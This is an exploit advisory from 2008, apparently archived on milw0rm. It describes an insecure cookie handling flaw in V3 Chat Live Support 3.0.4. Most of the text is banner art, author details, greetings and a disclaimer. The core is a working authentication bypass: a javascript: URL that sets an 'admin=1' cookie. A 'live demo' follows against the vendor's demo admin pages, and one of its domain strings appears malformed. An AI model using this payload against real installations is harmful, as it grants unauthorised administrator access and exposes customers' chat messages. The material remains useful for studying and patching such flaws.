V3 Chat Live Support 3.0.4 - Insecure Cookie Handling
***********************************************************************************************************************************************************
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!] O O O O O [!]
[!] O O O [!]
[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!] O OOO OOO O O O O OO O O O O OO O O O [!]
[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!] O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO [!]
***********************************************************************************************************************************************************
+---- Bismi Allah Irahmani ArraHim ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [ V3 Chat Live Support v3.0.4 Insecure Cookie Handling Vulnerability ] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: Author : Cyber-Zone ( Abdelkhalek) : : :
¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦
¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦
¦ From : MoroCCo ¦ ¦ ¦
¦ Script : http://v3chat.com ¦ ¦ ![ ]! ¦
¦ Download : http://v3chat.com/live_support.php ¦ ¦ ¦
¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦
¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦
¦ From The Dark Side Of MoroCCo ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: :
¦ Remember : ¦
¦ ------------- ¦
¦ ¦
¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦
¦ ¦
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
hato had code f URL :
javascript:document.cookie = "admin=1; path=/";
Live demo :
javascript:document.cookie = "admin=1; path=/v3livesupport-v304/admin/index.php; domain=v3chat.commain.php";
http://v3chat.com/v3livesupport-v304/admin/index.php
3awdo wtaw f enter f had Url :
http://v3chat.com/v3livesupport-v304/admin/messages.php
Please wait, logging you in... :)
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+---- ThanX To ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
= [AttaCk Is CompLet] =
___________________________________________________________________________________________________________________________________________________________
# milw0rm.com [2008-11-08]